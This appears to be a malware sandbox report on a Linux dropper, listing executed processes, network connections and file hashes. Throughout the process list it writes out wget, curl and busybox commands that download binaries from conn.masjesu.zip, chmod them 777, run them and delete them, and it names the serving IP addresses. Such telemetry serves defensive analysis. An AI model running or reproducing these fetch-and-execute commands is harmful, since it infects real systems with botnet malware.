/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/rm

[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/chmod

[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/rm

[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/chmod

[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/rm

[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/chmod

[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O

[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/rm

[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/chmod

[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/rm

[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/chmod

[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/rm

[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/chmod

[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/rm

[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/chmod

[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/rm

[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/chmod

[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/rm

[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/chmod

[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/rm

[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/chmod

[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/rm

[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/chmod

[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/rm

[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/chmod

[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/rm

[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/chmod

[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/rm

[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/chmod

[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/rm

[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/chmod

[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/rm

[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/chmod

[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/rm

[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/chmod

[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/rm

[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/chmod

[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/rm

[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/chmod

[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/rm

[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/chmod

[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/rm

[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/chmod

[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/rm

[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/chmod

[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/rm

[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/chmod

[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/rm

[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/chmod

[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/rm

[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/chmod

[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O

[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/rm

[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 conn.masjesu.zip udp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 8.8.8.8:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 91.189.91.81:80 security.ubuntu.com tcp
SE 194.71.11.163:80 se.archive.ubuntu.com tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.58:443 api.snapcraft.io tcp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.58:443 api.snapcraft.io tcp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 8.8.8.8:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 8.8.8.8:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 91.189.91.100:443 canonical-bos01.cdn.snapcraftcontent.com tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
US 1.1.1.1:53 api.snapcraft.io udp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp
US 1.1.1.1:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 1.1.1.1:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 91.189.91.43:443 canonical-bos01.cdn.snapcraftcontent.com tcp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp

Files

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97